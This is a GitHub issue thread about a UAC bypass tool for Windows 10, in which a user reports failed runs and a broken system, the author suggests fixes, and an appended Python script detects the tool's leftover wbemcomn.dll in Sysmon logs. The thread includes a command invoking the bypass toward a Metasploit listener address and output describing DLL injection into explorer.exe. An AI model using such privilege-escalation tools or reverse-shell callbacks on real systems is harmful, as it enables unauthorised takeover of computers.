Cn33liz / TpmInitUACBypass

Bypassing User Account Control (UAC) using TpmInit.exe

not work in windows 10 x64 ?????? #2

Open gearcapitan opened 8 years ago

gearcapitan commented 8 years ago

C:\Users\Pentesting>C:\Users\Pentesting\Desktop\TpmInitUACBypass.exe 192.168.0.66 668 msf


UAC Suicide Squad By Cn33liz 2016

[] Dropping needed DLL's from memory -> Done!
[] Write parameters into config file -> Done!
[] Now injecting the IFileOperation DLL into explorer.exe process....
[] And use the IFileOperation::CopyItem method to copy our DLL -> Oops something went wrong!

................................. other errors

https://gyazo.com/c207fa6d0cd51ef0b549dac477689d14 https://gyazo.com/b54b776240db79138c328771e16b91ae

Cn33liz commented 8 years ago

Are you sure your user is a member of the local administrator group? How are the UAC settings (this bypass only works if the UAC settings are default)?

Do you have the latest Windows 10 Anniversary update installed? Otherwise you need this version of the bypass: https://github.com/Cn33liz/TpmInitUACAnniversaryBypass

gearcapitan commented 8 years ago

First answer: yes. Second answer: yes. Third answer: yes.

And not only that, I am now also having problems with my Windows: I get a wbemprox.dll error message, and some programs no longer start because they say they do not have sufficient permissions to start the service or application. Even with right click and run as administrator, some applications do not work. I cannot install others because it says that the service cannot start due to lack of permissions. How do I fix it? And my virtual machines cannot run either :'(

https://gyazo.com/dc83b6cc9c467ffdfd7efbe781ffd81e

Cn33liz commented 8 years ago

The problem is that you probably used the wrong version of the bypass (you needed the Anniversary version), so the dll could not remove itself. Please remove the wbemcomn.dll from the C:\windows\system32\wbem folder. If you cannot remove it (because it's in use), please reboot Windows in command prompt mode and delete the file. Next time, please read the readme before running tools like this.

gearcapitan commented 8 years ago

And I did, but the problem still persists: some services do not start due to lack of privileges. It's as if my PC were now a standard user even though I am in the local administrator account. I still cannot reinstall VMware Workstation. The thing is more or less this: what I did was done as it is in the manual. My Windows is indeed the Anniversary version, but when I ran the program it did not send me the shell, so I thought to open a terminal as administrator and run the program from there, since that way it would obviously bypass the system, but after that the problems started. https://gyazo.com/fc1b9e7a5b15c55a3a72353190289737

Cn33liz commented 8 years ago

I don't know what the problem is with your system. If you successfully deleted the wbemcomn dll from c:\windows\system32\wbem, then you shouldn't have any problems caused by running this tool. If you want to test this tool, please read the readme or my blogpost and use the correct version. Always make snapshots of VMs before testing, or create a restore point within Windows, so if something goes wrong you can always restore to a previous working state.
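
A defender-side check for the leftover file named in the replies above, as an added example that is not part of the thread or of the project's code: it scans file-creation events for a wbemcomn.dll written into C:\windows\system32\wbem, normalising the path variants a log may contain. The field names follow Sysmon Event ID 11 (FileCreate); the sample events, the function names and C:\Windows as the system root are assumptions.

```python
import ntpath
import re

# Folder and file name come from the cleanup advice in the thread;
# C:\Windows as the system root is an assumption.
WBEM_DIR = r"c:\windows\system32\wbem"
LEFTOVER = "wbemcomn.dll"

# Constructed sample events (not from the thread). Field names follow
# Sysmon Event ID 11: Image is the writing process, TargetFilename the file.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\dllhost.exe",
     "TargetFilename": r"C:\Windows\System32\wbem\wbemcomn.dll"},
    {"Image": r"C:\Windows\explorer.exe",
     "TargetFilename": "c:/windows/system32/WBEM/../wbem/WBEMCOMN.DLL"},
    {"Image": r"C:\Tools\copy.exe",
     "TargetFilename": r"\\?\C:\Windows\System32\wbem\wbemcomn.dll"},
    # Same file name one directory up: must not match.
    {"Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\System32\wbemcomn.dll"},
    # Different file inside the wbem folder: must not match.
    {"Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\System32\wbem\wbemprox.dll"},
]

def normalize(path):
    # Unify separators, drop the extended-length prefix, collapse ".." and case.
    p = path.strip().strip('"').replace("/", "\\")
    p = re.sub(r"^\\\\\?\\", "", p)
    return ntpath.normpath(p).lower()

def is_leftover(target_filename):
    # True only for wbemcomn.dll sitting directly in the wbem folder.
    folder, name = ntpath.split(normalize(target_filename))
    return folder == WBEM_DIR and name == LEFTOVER

def scan(events):
    # Return (writer image name, original target) for each matching event.
    return [(ntpath.basename(ev["Image"]).lower(), ev["TargetFilename"])
            for ev in events if is_leftover(ev["TargetFilename"])]

if __name__ == "__main__":
    for writer, target in scan(SAMPLE_EVENTS):
        print(f"ALERT wbemcomn.dll written to wbem folder by {writer}: {target}")
```

The match is on the target path only, so the writing process is reported for triage rather than used as a filter.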

gearcapitan commented 8 years ago

Hello, me again, sorry for the bother. This time I compiled the code manually in Visual Studio and I still get the message in the picture, and I get it on my local machine and on my virtual machines. Forget everything I posted before, I already fixed that, but I simply do not get past "Oops something went wrong!". Could it be that I received some update that patched the vulnerability? What else can I try?

https://gyazo.com/3ec9e3d1395f0d4b5729daff0ff9522f